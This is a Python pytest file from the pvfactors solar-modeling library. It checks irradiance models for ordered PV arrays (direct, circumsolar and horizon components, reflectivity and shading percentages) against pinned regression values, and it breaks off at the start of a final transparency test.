pvfactors/tests/test_irradiance/test_models.py
|
soreva/pvfactors
|
422f883fd6e68c38900ceb74977b3267555f3fee
|
[
"BSD-3-Clause"
] | 60
|
2018-07-31T03:09:46.000Z
|
2022-03-03T20:02:19.000Z
|
pvfactors/tests/test_irradiance/test_models.py
|
soreva/pvfactors
|
422f883fd6e68c38900ceb74977b3267555f3fee
|
[
"BSD-3-Clause"
] | 18
|
2018-08-02T00:00:29.000Z
|
2022-02-02T13:47:33.000Z
|
import pytest
from pvfactors.irradiance import IsotropicOrdered, HybridPerezOrdered
from pvfactors.irradiance.base import BaseModel
from pvfactors.geometry.pvarray import OrderedPVArray
from pvfactors.geometry.base import PVSurface
from pvfactors.geometry.pvrow import PVRow
from pvlib.tools import cosd
import numpy as np
import pandas as pd
import datetime as dt
@pytest.fixture(scope='function')
def params_irr():
    """Canonical ordered-PV-array parameters shared by the irradiance tests."""
    yield {
        'n_pvrows': 3,
        'pvrow_height': 2.5,
        'pvrow_width': 2.,
        'surface_azimuth': 90.,  # east oriented modules
        'axis_azimuth': 0.,      # axis of rotation towards North
        'surface_tilt': 20.,
        'gcr': 0.6,
        'solar_zenith': 65.,
        'solar_azimuth': 90.,    # sun located in the east
        'rho_ground': 0.2,
        'rho_front_pvrow': 0.01,
        'rho_back_pvrow': 0.03,
    }
def test_isotropic_model_front(params_irr):
    """Direct shading on front surface"""
    # Create and fit irradiance model
    DNI = 1000.
    DHI = 100.
    irr_model = IsotropicOrdered()
    irr_model.fit(None, DNI, DHI,
                  params_irr['solar_zenith'],
                  params_irr['solar_azimuth'],
                  params_irr['surface_tilt'],
                  params_irr['surface_azimuth'],
                  params_irr['rho_ground'])
    # Expected values: AOI is 45 deg on the tilted front side, 65 deg
    # (the solar zenith) on the horizontal ground.
    expected_dni_pvrow = DNI * cosd(45)
    expected_dni_ground = DNI * cosd(65)
    # Check irradiance fitting
    np.testing.assert_almost_equal(irr_model.direct['ground_illum'][0],
                                   expected_dni_ground)
    np.testing.assert_almost_equal(irr_model.direct['front_illum_pvrow'][0],
                                   expected_dni_pvrow)
    assert irr_model.direct['back_illum_pvrow'][0] == 0.
    # Create, fit, and transform pv array
    pvarray = OrderedPVArray.fit_from_dict_of_scalars(
        params_irr, param_names=IsotropicOrdered.params)
    irr_model.transform(pvarray)
    # there should be some direct shading
    assert pvarray.ts_pvrows[0].front.shaded_length
    # Get modeling vectors
    irradiance_mat, rho_mat, invrho_mat, total_perez_mat = \
        irr_model.get_ts_modeling_vectors(pvarray)
    # Check transform
    # NOTE(review): 40 surfaces total — presumably shaded ground, illuminated
    # ground, then the pv-row front/back segments; confirm ordering against
    # get_ts_modeling_vectors.
    expected_irradiance_vec = [
        0., 0., 0., 0., 0.,
        0., 0., 0., 0., 0.,
        0., 0., 422.61826174, 422.61826174, 422.61826174,
        422.61826174, 422.61826174, 422.61826174, 422.61826174, 422.61826174,
        422.61826174, 422.61826174, 422.61826174, 422.61826174, 422.61826174,
        422.61826174, 422.61826174, 422.61826174, 707.10678119, 0.,
        0., 0., 707.10678119, 0., 0.,
        0., 707.10678119, 0., 0., 0.]
    # pvrow: illuminated front segments see full direct, shaded and back see 0
    np.testing.assert_almost_equal(
        pvarray.ts_pvrows[2].front.get_param_weighted('direct'),
        expected_dni_pvrow)
    np.testing.assert_almost_equal(
        pvarray.ts_pvrows[1].front.list_segments[0]
        .illum.get_param_weighted('direct'), expected_dni_pvrow)
    np.testing.assert_almost_equal(
        pvarray.ts_pvrows[1].front.list_segments[0]
        .shaded.get_param_weighted('direct'), 0.)
    np.testing.assert_almost_equal(
        pvarray.ts_pvrows[0].back.get_param_weighted('direct'), 0.)
    # ground
    np.testing.assert_almost_equal(
        pvarray.ts_ground.illum.get_param_weighted('direct'),
        expected_dni_ground)
    np.testing.assert_almost_equal(
        pvarray.ts_ground.shaded.get_param_weighted('direct'), 0.)
    np.testing.assert_array_almost_equal(expected_irradiance_vec,
                                         np.squeeze(irradiance_mat))
    # Check invrho_vec: 1/0.2 = 5 for ground, 1/0.01 = 100 for front,
    # 1/0.03 = 33.33 for back surfaces
    expected_invrho_vec = [
        5., 5., 5., 5., 5.,
        5., 5., 5., 5., 5.,
        5., 5., 5., 5., 5.,
        5., 5., 5., 5., 5.,
        5., 5., 5., 5., 5.,
        5., 5., 5., 100., 100.,
        33.33333333, 33.33333333, 100., 100., 33.33333333,
        33.33333333, 100., 100., 33.33333333, 33.33333333]
    np.testing.assert_array_almost_equal(np.squeeze(invrho_mat),
                                         expected_invrho_vec)
    np.testing.assert_almost_equal(
        pvarray.ts_pvrows[0].front.get_param_weighted('rho'),
        params_irr['rho_front_pvrow'])
    np.testing.assert_almost_equal(
        pvarray.ts_pvrows[0].back.get_param_weighted('rho'),
        params_irr['rho_back_pvrow'])
    np.testing.assert_almost_equal(
        pvarray.ts_ground.get_param_weighted('rho'),
        params_irr['rho_ground'])
    # Check total perez vec
    expected_total_perez_vec = [
        100., 100., 100., 100., 100.,
        100., 100., 100., 100., 100.,
        100., 100., 522.61826174, 522.61826174, 522.61826174,
        522.61826174, 522.61826174, 522.61826174, 522.61826174, 522.61826174,
        522.61826174, 522.61826174, 522.61826174, 522.61826174, 522.61826174,
        522.61826174, 522.61826174, 522.61826174, 807.243186, 100.13640481,
        0., 0., 807.243186, 100.13640481, 0.,
        0., 807.243186, 100.13640481, 0., 0.]
    np.testing.assert_array_almost_equal(np.squeeze(total_perez_mat),
                                         expected_total_perez_vec)
    # check that 2 dimensional
    assert np.shape(irradiance_mat) == (40, 1)
    # check faoi modifiers (model defaults, not set by this test)
    assert irr_model.faoi_back['direct'] == 0.97
    assert irr_model.faoi_front['direct'] == 0.99
    assert irr_model.faoi_ground == 0.8
    # get absorbed sum of sky components
    irr_comp_absorbed = irr_model.get_summed_components(pvarray, absorbed=True)
    assert np.shape(irr_comp_absorbed) == (40, 1)
    # Check a ground surface value: absorbed = (1 - albedo) * incident
    np.testing.assert_allclose(np.array(irr_comp_absorbed)[12, 0],
                               (1. - params_irr['rho_ground']) *
                               np.array(irradiance_mat)[12, 0])
def test_isotropic_model_back(params_irr):
    """Direct shading on back surface"""
    # Flip the array so the back side faces the sun (tilt 160, azimuth 270)
    params_irr.update({'surface_azimuth': 270,
                       'surface_tilt': 160})
    # Apply irradiance model
    DNI = 1000.
    DHI = 100.
    irr_model = IsotropicOrdered()
    irr_model.fit(None, DNI, DHI,
                  params_irr['solar_zenith'],
                  params_irr['solar_azimuth'],
                  params_irr['surface_tilt'],
                  params_irr['surface_azimuth'],
                  params_irr['rho_ground'])
    # Expected values: same AOI geometry as the front-side test, but the
    # direct component now lands on the back side
    expected_dni_pvrow = DNI * cosd(45)
    expected_dni_ground = DNI * cosd(65)
    # Check fitting
    np.testing.assert_almost_equal(irr_model.direct['ground_illum'][0],
                                   expected_dni_ground)
    np.testing.assert_almost_equal(irr_model.direct['back_illum_pvrow'][0],
                                   expected_dni_pvrow)
    assert irr_model.direct['front_illum_pvrow'][0] == 0.
    # Create, fit, and transform pv array
    pvarray = OrderedPVArray.fit_from_dict_of_scalars(
        params_irr, param_names=IsotropicOrdered.params)
    irr_model.transform(pvarray)
    # there should be some direct shading
    assert pvarray.ts_pvrows[0].back.shaded_length
    # Get modeling vectors
    irradiance_mat, rho_mat, invrho_mat, total_perez_mat = \
        irr_model.get_ts_modeling_vectors(pvarray)
    # Check
    expected_irradiance_mat = [
        0., 0., 0., 0.,
        0., 0., 0., 0.,
        0., 0., 0., 0.,
        422.61826174, 422.61826174, 422.61826174, 422.61826174,
        422.61826174, 422.61826174, 422.61826174, 422.61826174,
        422.61826174, 422.61826174, 422.61826174, 422.61826174,
        422.61826174, 422.61826174, 422.61826174, 422.61826174,
        0., 0., 707.10678119, 0.,
        0., 0., 707.10678119, 0.,
        0., 0., 707.10678119, 0.]
    # pvrow: direct now hits illuminated back segments; front sees 0
    np.testing.assert_almost_equal(
        pvarray.ts_pvrows[2].back.get_param_weighted('direct'),
        expected_dni_pvrow)
    np.testing.assert_almost_equal(
        pvarray.ts_pvrows[1].back.list_segments[0]
        .illum.get_param_weighted('direct'), expected_dni_pvrow)
    np.testing.assert_almost_equal(
        pvarray.ts_pvrows[1].back.list_segments[0]
        .shaded.get_param_weighted('direct'), 0.)
    np.testing.assert_almost_equal(
        pvarray.ts_pvrows[0].front.get_param_weighted('direct'), 0.)
    # ground
    np.testing.assert_almost_equal(
        pvarray.ts_ground
        .illum.get_param_weighted('direct'), expected_dni_ground)
    np.testing.assert_almost_equal(
        pvarray.ts_ground
        .shaded.get_param_weighted('direct'), 0.)
    np.testing.assert_array_almost_equal(expected_irradiance_mat,
                                         np.squeeze(irradiance_mat))
    # Check invrho_mat: 1/0.2 = 5 ground, 1/0.01 = 100 front,
    # 1/0.03 = 33.33 back
    expected_invrho_mat = [
        5., 5., 5., 5.,
        5., 5., 5., 5.,
        5., 5., 5., 5.,
        5., 5., 5., 5.,
        5., 5., 5., 5.,
        5., 5., 5., 5.,
        5., 5., 5., 5.,
        100., 100., 33.33333333, 33.33333333,
        100., 100., 33.33333333, 33.33333333,
        100., 100., 33.33333333, 33.33333333]
    np.testing.assert_array_almost_equal(np.squeeze(invrho_mat),
                                         expected_invrho_mat)
    np.testing.assert_almost_equal(
        pvarray.ts_pvrows[0].front.get_param_weighted('rho'),
        params_irr['rho_front_pvrow'])
    np.testing.assert_almost_equal(
        pvarray.ts_pvrows[0].back.get_param_weighted('rho'),
        params_irr['rho_back_pvrow'])
    np.testing.assert_almost_equal(
        pvarray.ts_ground.get_param_weighted('rho'),
        params_irr['rho_ground'])
    # Check total perez vec
    expected_total_perez_mat = [
        100., 100., 100., 100.,
        100., 100., 100., 100.,
        100., 100., 100., 100.,
        522.61826174, 522.61826174, 522.61826174, 522.61826174,
        522.61826174, 522.61826174, 522.61826174, 522.61826174,
        522.61826174, 522.61826174, 522.61826174, 522.61826174,
        522.61826174, 522.61826174, 522.61826174, 522.61826174,
        104.38724754, 104.38724754, 0., 0.,
        104.38724754, 104.38724754, 0., 0.,
        104.38724754, 104.38724754, 0., 0.]
    np.testing.assert_array_almost_equal(np.squeeze(total_perez_mat),
                                         expected_total_perez_mat)
    # Get ts modeling matrices (the "full" variant adds one extra surface,
    # hence 41 rows vs 40 above)
    irradiance_mat, rho_mat, invrho_mat, total_perez_mat = \
        irr_model.get_full_ts_modeling_vectors(pvarray)
    # check that 2 dimensional
    assert irradiance_mat.shape == (41, 1)
def test_hybridperez_ordered_front(params_irr):
    """Full check of HybridPerezOrdered on an ordered PV array with direct
    light hitting the front side: fitting outputs, per-surface transform
    values (direct, circumsolar, horizon), modeling vectors, reflectivity
    values, the total Perez vector, faoi modifiers, and absorbed components.

    All hard-coded floats are regression values pinned from a previous run.
    """
    # Apply irradiance model
    DNI = 1000.
    DHI = 100.
    ts = dt.datetime(2019, 6, 14, 11)
    irr_model = HybridPerezOrdered(horizon_band_angle=6.5)
    irr_model.fit(ts, DNI, DHI,
                  params_irr['solar_zenith'],
                  params_irr['solar_azimuth'],
                  params_irr['surface_tilt'],
                  params_irr['surface_azimuth'],
                  params_irr['rho_ground'])
    # Expected values
    expected_dni_pvrow = DNI * cosd(45)
    expected_dni_ground = DNI * cosd(65)
    expected_circ_pvrow = 61.542748619313045
    # FIXME: it doesn't seem right that circumsolar stronger on ground
    expected_circ_ground = 36.782407037017585
    expected_hor_pvrow_no_shad = 7.2486377533042452
    expected_hor_pvrow_w_shad = 2.1452692285058985
    horizon_shading_pct = 70.404518731426592
    # Check fitting
    np.testing.assert_almost_equal(irr_model.direct['ground_illum'][0],
                                   expected_dni_ground)
    np.testing.assert_almost_equal(irr_model.direct['front_illum_pvrow'][0],
                                   expected_dni_pvrow)
    # Back side gets no direct light in this configuration
    assert irr_model.direct['back_illum_pvrow'][0] == 0.
    # Create, fit, and transform pv array
    pvarray = OrderedPVArray.fit_from_dict_of_scalars(
        params_irr, param_names=IsotropicOrdered.params)
    irr_model.transform(pvarray)
    # there should be some direct shading
    assert pvarray.ts_pvrows[0].front.shaded_length
    # Get modeling vectors
    irradiance_mat, rho_mat, invrho_mat, total_perez_mat = \
        irr_model.get_ts_modeling_vectors(pvarray)
    # Test isotropic_luminance
    np.testing.assert_almost_equal(irr_model.isotropic_luminance,
                                   63.21759296)
    # Check transform
    # Flattened per-surface values (presumably ground surfaces first, then
    # pv row surfaces — confirm ordering against the pvarray indexing)
    expected_irradiance_mat = [
        0., 0., 0., 0.,
        0., 0., 0., 0.,
        0., 0., 0., 0.,
        459.40066878, 459.40066878, 459.40066878, 459.40066878,
        459.40066878, 459.40066878, 459.40066878, 459.40066878,
        459.40066878, 459.40066878, 459.40066878, 459.40066878,
        459.40066878, 459.40066878, 459.40066878, 459.40066878,
        775.89816756, 7.24863775, 7.24863775, 7.24863775,
        775.89816756, 7.24863775, 2.14526923, 0.,
        775.89816756, 7.24863775, 2.14526923, 0.]
    # pvrow direct
    np.testing.assert_almost_equal(
        pvarray.ts_pvrows[2].front.get_param_weighted('direct'),
        expected_dni_pvrow)
    np.testing.assert_almost_equal(
        pvarray.ts_pvrows[1].front.list_segments[0]
        .illum.get_param_weighted('direct'), expected_dni_pvrow)
    np.testing.assert_almost_equal(
        pvarray.ts_pvrows[1].front.list_segments[0]
        .shaded.get_param_weighted('direct'), 0.)
    np.testing.assert_almost_equal(
        pvarray.ts_pvrows[0].back.get_param_weighted('direct'), 0.)
    # pvrow circumsolar
    np.testing.assert_almost_equal(
        pvarray.ts_pvrows[2].front.get_param_weighted('circumsolar'),
        expected_circ_pvrow)
    np.testing.assert_almost_equal(
        pvarray.ts_pvrows[1].front.list_segments[0]
        .illum.get_param_weighted('circumsolar'),
        expected_circ_pvrow)
    np.testing.assert_almost_equal(
        pvarray.ts_pvrows[1].front.list_segments[0]
        .shaded.get_param_weighted('circumsolar'), 0.)
    np.testing.assert_almost_equal(
        pvarray.ts_pvrows[1].back.list_segments[0]
        .illum.get_param_weighted('circumsolar'), 0.)
    # pvrow horizon
    np.testing.assert_almost_equal(
        pvarray.ts_pvrows[1].front.list_segments[0]
        .illum.get_param_weighted('horizon'),
        expected_hor_pvrow_no_shad)
    np.testing.assert_almost_equal(
        pvarray.ts_pvrows[1].front.list_segments[0]
        .shaded.get_param_weighted('horizon'),
        expected_hor_pvrow_no_shad)
    np.testing.assert_almost_equal(
        pvarray.ts_pvrows[0].back.list_segments[0]
        .illum.get_param_weighted('horizon'),
        expected_hor_pvrow_no_shad)
    # Middle row's back side is horizon-shaded by its neighbors
    np.testing.assert_almost_equal(
        pvarray.ts_pvrows[1].back.list_segments[0]
        .illum.get_param_weighted('horizon'),
        expected_hor_pvrow_w_shad)
    np.testing.assert_almost_equal(
        pvarray.ts_pvrows[1].back.list_segments[0]
        .illum.get_param_weighted('horizon_shd_pct'),
        horizon_shading_pct)
    # ground
    np.testing.assert_almost_equal(
        pvarray.ts_ground.get_param_weighted('horizon'), 0.)
    np.testing.assert_almost_equal(
        pvarray.ts_ground
        .illum.get_param_weighted('direct'), expected_dni_ground)
    np.testing.assert_almost_equal(
        pvarray.ts_ground
        .illum.get_param_weighted('circumsolar'),
        expected_circ_ground)
    np.testing.assert_almost_equal(
        pvarray.ts_ground
        .shaded.get_param_weighted('direct'), 0.)
    np.testing.assert_array_almost_equal(expected_irradiance_mat,
                                         np.squeeze(irradiance_mat))
    # Check invrho_mat
    # Inverse reflectivities: 5. = 1/0.2 (ground), then pv row values
    expected_invrho_mat = [
        5., 5., 5., 5.,
        5., 5., 5., 5.,
        5., 5., 5., 5.,
        5., 5., 5., 5.,
        5., 5., 5., 5.,
        5., 5., 5., 5.,
        5., 5., 5., 5.,
        100., 100., 33.33333333, 33.33333333,
        100., 100., 33.33333333, 33.33333333,
        100., 100., 33.33333333, 33.33333333]
    np.testing.assert_array_almost_equal(np.squeeze(invrho_mat),
                                         expected_invrho_mat)
    np.testing.assert_almost_equal(
        pvarray.ts_pvrows[0].front.get_param_weighted('rho'),
        params_irr['rho_front_pvrow'])
    np.testing.assert_almost_equal(
        pvarray.ts_pvrows[0].back.get_param_weighted('rho'),
        params_irr['rho_back_pvrow'])
    np.testing.assert_almost_equal(
        pvarray.ts_ground.get_param_weighted('rho'),
        params_irr['rho_ground'])
    # Check total perez vec
    expected_total_perez_mat = [
        63.21759296, 63.21759296, 63.21759296, 63.21759296,
        63.21759296, 63.21759296, 63.21759296, 63.21759296,
        63.21759296, 63.21759296, 63.21759296, 63.21759296,
        522.61826174, 522.61826174, 522.61826174, 522.61826174,
        522.61826174, 522.61826174, 522.61826174, 522.61826174,
        522.61826174, 522.61826174, 522.61826174, 522.61826174,
        522.61826174, 522.61826174, 522.61826174, 522.61826174,
        807.243186, 38.59365619, 0., 0.,
        807.243186, 38.59365619, 0., 0.,
        807.243186, 38.59365619, 0., 0.]
    np.testing.assert_array_almost_equal(np.squeeze(total_perez_mat),
                                         expected_total_perez_mat)
    # Get ts modeling matrices
    irradiance_mat, rho_mat, invrho_mat, total_perez_mat = \
        irr_model.get_full_ts_modeling_vectors(pvarray)
    # check that 2 dimensional
    assert irradiance_mat.shape == (41, 1)
    # check faoi modifiers
    # NOTE(review): these values presumably come from HybridPerezOrdered
    # defaults — confirm against the model's constructor
    assert irr_model.faoi_back['circumsolar'] == 0.97
    assert irr_model.faoi_back['horizon'] == 0.97
    assert irr_model.faoi_front['direct'] == 0.99
    assert irr_model.faoi_ground == 0.8
    # get absorbed sum of sky components
    irr_comp_absorbed = irr_model.get_summed_components(pvarray, absorbed=True)
    assert np.shape(irr_comp_absorbed) == (40, 1)
    # Check a ground surface value
    # Absorbed = (1 - reflectivity) * incident for the ground surface
    np.testing.assert_allclose(np.array(irr_comp_absorbed)[12, 0],
                               (1. - params_irr['rho_ground']) *
                               np.array(irradiance_mat)[12, 0])
def test_hybridperez_ordered_back(params_irr):
    """Full check of HybridPerezOrdered with the array flipped so that
    direct light hits the back side (surface_azimuth=270, surface_tilt=160):
    fitting outputs, per-surface transform values, modeling vectors,
    reflectivity values, and the total Perez vector.

    All hard-coded floats are regression values pinned from a previous run.
    """
    # Flip the array so that the back surfaces face the sun
    params_irr.update({'surface_azimuth': 270,
                       'surface_tilt': 160})
    # Apply irradiance model
    DNI = 1000.
    DHI = 100.
    ts = dt.datetime(2019, 6, 14, 11)
    irr_model = HybridPerezOrdered(horizon_band_angle=50)
    irr_model.fit(ts, DNI, DHI,
                  params_irr['solar_zenith'],
                  params_irr['solar_azimuth'],
                  params_irr['surface_tilt'],
                  params_irr['surface_azimuth'],
                  params_irr['rho_ground'])
    # Expected values
    expected_dni_pvrow = DNI * cosd(45)
    expected_dni_ground = DNI * cosd(65)
    expected_circ_pvrow = 61.542748619313045
    # FIXME: it doesn't seem right that circumsolar stronger on ground
    expected_circ_ground = 36.782407037017585
    expected_hor_pvrow_no_shad = 7.2486377533042452
    expected_hor_pvrow_w_shad_1 = 6.0760257690033654
    expected_hor_pvrow_w_shad_2 = 3.6101632102156898
    horizon_shading_pct_1 = 16.176997998918541
    horizon_shading_pct_2 = 50.195287265251757
    # Check fitting
    np.testing.assert_almost_equal(irr_model.direct['ground_illum'][0],
                                   expected_dni_ground)
    np.testing.assert_almost_equal(irr_model.direct['back_illum_pvrow'][0],
                                   expected_dni_pvrow)
    # Front side gets no direct light in this flipped configuration
    assert irr_model.direct['front_illum_pvrow'][0] == 0.
    # Create, fit, and transform pv array
    pvarray = OrderedPVArray.fit_from_dict_of_scalars(
        params_irr, param_names=IsotropicOrdered.params)
    irr_model.transform(pvarray)
    # there should be some direct shading
    assert pvarray.ts_pvrows[0].back.shaded_length
    # Get modeling vectors
    irradiance_mat, rho_mat, invrho_mat, total_perez_mat = \
        irr_model.get_ts_modeling_vectors(pvarray)
    # Test isotropic_luminance
    np.testing.assert_almost_equal(irr_model.isotropic_luminance,
                                   63.21759296)
    # Check transform
    expected_irradiance_mat = [
        0., 0., 0., 0.,
        0., 0., 0., 0.,
        0., 0., 0., 0.,
        459.40066878, 459.40066878, 459.40066878, 459.40066878,
        459.40066878, 459.40066878, 459.40066878, 459.40066878,
        459.40066878, 459.40066878, 459.40066878, 459.40066878,
        459.40066878, 459.40066878, 459.40066878, 459.40066878,
        7.24863775, 7.24863775, 774.72555557, 3.61016321,
        7.24863775, 7.24863775, 774.72555557, 3.61016321,
        7.24863775, 7.24863775, 775.89816756, 7.24863775]
    # pvrow direct
    np.testing.assert_almost_equal(
        pvarray.ts_pvrows[2].back.get_param_weighted('direct'),
        expected_dni_pvrow)
    np.testing.assert_almost_equal(
        pvarray.ts_pvrows[1].back.list_segments[0]
        .illum.get_param_weighted('direct'), expected_dni_pvrow)
    np.testing.assert_almost_equal(
        pvarray.ts_pvrows[1].back.list_segments[0]
        .shaded.get_param_weighted('direct'), 0.)
    np.testing.assert_almost_equal(
        pvarray.ts_pvrows[0].front.get_param_weighted('direct'), 0.)
    # pvrow circumsolar
    np.testing.assert_almost_equal(
        pvarray.ts_pvrows[2].back.get_param_weighted('circumsolar'),
        expected_circ_pvrow)
    np.testing.assert_almost_equal(
        pvarray.ts_pvrows[1].back.list_segments[0]
        .illum.get_param_weighted('circumsolar'),
        expected_circ_pvrow)
    np.testing.assert_almost_equal(
        pvarray.ts_pvrows[1].back.list_segments[0]
        .shaded.get_param_weighted('circumsolar'), 0.)
    np.testing.assert_almost_equal(
        pvarray.ts_pvrows[1].front.list_segments[0]
        .illum.get_param_weighted('circumsolar'), 0.)
    # pvrow horizon
    np.testing.assert_almost_equal(
        pvarray.ts_pvrows[1].front.get_param_weighted('horizon'),
        expected_hor_pvrow_no_shad)
    # Back sides see two levels of horizon shading (illum vs shaded areas)
    np.testing.assert_almost_equal(
        pvarray.ts_pvrows[1].back.list_segments[0]
        .illum.get_param_weighted('horizon'),
        expected_hor_pvrow_w_shad_1)
    np.testing.assert_almost_equal(
        pvarray.ts_pvrows[1].back.list_segments[0]
        .shaded.get_param_weighted('horizon'),
        expected_hor_pvrow_w_shad_2)
    np.testing.assert_almost_equal(
        pvarray.ts_pvrows[0].back.list_segments[0]
        .illum.get_param_weighted('horizon'),
        expected_hor_pvrow_w_shad_1)
    np.testing.assert_almost_equal(
        pvarray.ts_pvrows[0].back.list_segments[0]
        .shaded.get_param_weighted('horizon'),
        expected_hor_pvrow_w_shad_2)
    np.testing.assert_almost_equal(
        pvarray.ts_pvrows[1].back.list_segments[0]
        .illum.get_param_weighted('horizon_shd_pct'),
        horizon_shading_pct_1)
    np.testing.assert_almost_equal(
        pvarray.ts_pvrows[1].back.list_segments[0]
        .shaded.get_param_weighted('horizon_shd_pct'),
        horizon_shading_pct_2)
    # ground
    np.testing.assert_almost_equal(
        pvarray.ts_ground.get_param_weighted('horizon'), 0.)
    np.testing.assert_almost_equal(
        pvarray.ts_ground
        .illum.get_param_weighted('direct'), expected_dni_ground)
    np.testing.assert_almost_equal(
        pvarray.ts_ground
        .illum.get_param_weighted('circumsolar'),
        expected_circ_ground)
    np.testing.assert_almost_equal(
        pvarray.ts_ground
        .shaded.get_param_weighted('direct'), 0.)
    np.testing.assert_array_almost_equal(expected_irradiance_mat,
                                         np.squeeze(irradiance_mat))
    # Check invrho_mat
    expected_invrho_mat = [
        5., 5., 5., 5.,
        5., 5., 5., 5.,
        5., 5., 5., 5.,
        5., 5., 5., 5.,
        5., 5., 5., 5.,
        5., 5., 5., 5.,
        5., 5., 5., 5.,
        100., 100., 33.33333333, 33.33333333,
        100., 100., 33.33333333, 33.33333333,
        100., 100., 33.33333333, 33.33333333]
    np.testing.assert_array_almost_equal(np.squeeze(invrho_mat), expected_invrho_mat)
    np.testing.assert_almost_equal(
        pvarray.ts_pvrows[0].front.get_param_weighted('rho'),
        params_irr['rho_front_pvrow'])
    np.testing.assert_almost_equal(
        pvarray.ts_pvrows[0].back.get_param_weighted('rho'),
        params_irr['rho_back_pvrow'])
    np.testing.assert_almost_equal(
        pvarray.ts_ground.get_param_weighted('rho'),
        params_irr['rho_ground'])
    # Check total perez vec
    expected_total_perez_mat = [
        63.21759296, 63.21759296, 63.21759296, 63.21759296,
        63.21759296, 63.21759296, 63.21759296, 63.21759296,
        63.21759296, 63.21759296, 63.21759296, 63.21759296,
        522.61826174, 522.61826174, 522.61826174, 522.61826174,
        522.61826174, 522.61826174, 522.61826174, 522.61826174,
        522.61826174, 522.61826174, 522.61826174, 522.61826174,
        522.61826174, 522.61826174, 522.61826174, 522.61826174,
        104.38724754, 104.38724754, 0., 0.,
        104.38724754, 104.38724754, 0., 0.,
        104.38724754, 104.38724754, 0., 0.]
    np.testing.assert_array_almost_equal(np.squeeze(total_perez_mat),
                                         expected_total_perez_mat)
    # Get ts modeling matrices
    irradiance_mat, rho_mat, invrho_mat, total_perez_mat = \
        irr_model.get_full_ts_modeling_vectors(pvarray)
    # check that 2 dimensional
    assert irradiance_mat.shape == (41, 1)
def test_hybridperez_circ_shading():
    """The circumsolar-shading-pct helper should return the pinned value."""
    # Irradiance model with an explicit circumsolar configuration
    model = HybridPerezOrdered(circumsolar_angle=30.,
                               circumsolar_model='uniform_disk')
    # One vertical surface shaded by a single neighboring pv row
    shaded_surface = PVSurface(coords=[(0, -1), (0, 1)])
    neighbor_rows = [PVRow.from_linestring_coords([(1, -1), (1, 1)])]
    # Solar vector below 45 deg elevation, so expect more than 50% shading
    sun_vector_2d = [1.2, 1]
    neighbor_index = 0
    pct_shading = model._calculate_circumsolar_shading_pct(
        shaded_surface, neighbor_index, neighbor_rows, sun_vector_2d)
    np.testing.assert_almost_equal(pct_shading, 71.5969299216)
def test_hybridperez_horizon_shading_ts():
    """Timeseries horizon shading percentages should match pinned values."""
    # PV array geometry parameters
    base_params = {
        'n_pvrows': 3,
        'pvrow_height': 1,
        'pvrow_width': 1,
        'axis_azimuth': 0.,
        'gcr': 0.3
    }
    # Timeseries solar position / surface orientation inputs
    angles = pd.DataFrame({
        'solar_zenith': [70., 80., 80., 70., 10.],
        'solar_azimuth': [270., 90., 270., 90., 90.],
        'surface_tilt': [20., 10., 20., 30., 0.],
        'surface_azimuth': [270., 270., 90., 90., 90.]})
    # Build the ordered pv array and fit it to the timeseries inputs
    pvarray = OrderedPVArray.init_from_dict(base_params)
    pvarray.fit(angles.solar_zenith, angles.solar_azimuth,
                angles.surface_tilt, angles.surface_azimuth)
    # Irradiance model with a 15 deg horizon band
    model = HybridPerezOrdered(horizon_band_angle=15.)
    row_index = 1
    # Use the centroid of the middle row's back-side segment as reference
    centroid = (pvarray.ts_pvrows[row_index].back.list_segments[0]
                .coords.centroid)
    left_tilted = pvarray.rotation_vec > 0
    pct_shading = model._calculate_horizon_shading_pct_ts(
        pvarray.ts_pvrows, centroid, row_index, left_tilted,
        is_back_side=True)
    # Pinned regression values guard against behavior drift
    np.testing.assert_allclose(
        np.array([17.163813, 8.667262, 17.163813, 25.317135, 0.]),
        pct_shading)
def test_hybridperez_transform(df_inputs_clearsky_8760):
    """Check HybridPerezOrdered.transform on 24 hours of clearsky timeseries
    inputs: pinned horizon values on the middle row's back side, pinned
    circumsolar values on the illuminated ground, and consistency of the
    ``.at(idx)`` snapshot accessors with the timeseries parameters.

    All hard-coded floats are regression values pinned from a previous run.
    """
    n_points = 24
    df_inputs = df_inputs_clearsky_8760.iloc[:n_points, :]
    # Base params
    params = {
        'n_pvrows': 3,
        'pvrow_height': 1,
        'pvrow_width': 1,
        'axis_azimuth': 0.,
        'gcr': 0.3
    }
    albedo = 0.2
    # Initialize and fit pv array
    pvarray = OrderedPVArray.init_from_dict(params)
    # Fit pv array to timeseries data
    pvarray.fit(df_inputs.solar_zenith, df_inputs.solar_azimuth,
                df_inputs.surface_tilt, df_inputs.surface_azimuth)
    # irradiance model
    model = HybridPerezOrdered(horizon_band_angle=15.)
    model.fit(df_inputs.index, df_inputs.dni.values, df_inputs.dhi.values,
              df_inputs.solar_zenith.values, df_inputs.solar_azimuth.values,
              df_inputs.surface_tilt.values, df_inputs.surface_azimuth.values,
              albedo)
    model.transform(pvarray)
    # Check timeseries parameters
    # Zero entries are hours with no computed horizon contribution
    expected_middle_back_horizon = np.array(
        [0., 0., 0., 0., 0., 0.,
         0., 0.8244883, 4.43051118, 6.12136418, 6.03641816, 2.75109931,
         3.15586037, 6.14709947, 6.02242241, 4.25283177, 0.58518296, 0.,
         0., 0., 0., 0., 0., 0.])
    # Only the non-zero entries are compared against the transform output
    list_idx = np.where(expected_middle_back_horizon != 0)
    np.testing.assert_allclose(
        expected_middle_back_horizon[list_idx],
        pvarray.ts_pvrows[1].back.list_segments[0]
        .illum.get_param_weighted('horizon')[list_idx])
    expected_ground_circ = np.array(
        [0., 0., 0., 0., 0.,
         0., 0., 2.19047189, 8.14152575, 13.9017384,
         18.54394777, 21.11510529, 21.00554831, 18.24251837, 13.47583799,
         7.66930532, 1.74693357, 0., 0., 0.,
         0., 0., 0., 0.])
    np.testing.assert_allclose(
        expected_ground_circ,
        pvarray.ts_ground.illum_params['circumsolar'])
    # Shaded ground gets zero circumsolar at every timestamp
    np.testing.assert_allclose(
        np.zeros(n_points),
        pvarray.ts_ground.shaded_params['circumsolar'])
    # Check at a given time idx: the scalar snapshot at hour 7 must match
    # the timeseries values at index 7
    pvrow = pvarray.ts_pvrows[1].at(7)
    np.testing.assert_allclose(
        pvrow.back.list_segments[0]
        .illum_collection.get_param_weighted('horizon'),
        expected_middle_back_horizon[7])
    pvground = pvarray.ts_ground.at(7)
    np.testing.assert_allclose(
        pvground.list_segments[0].illum_collection
        .get_param_weighted('circumsolar'),
        expected_ground_circ[7])
def test_hybridperez_ordered_transparency_spacing_front(params_irr):
    """Module transparency and spacing should scale the shaded-surface
    irradiance components in HybridPerezOrdered (front-side shading case)."""
    dni, dhi = 1000., 100.
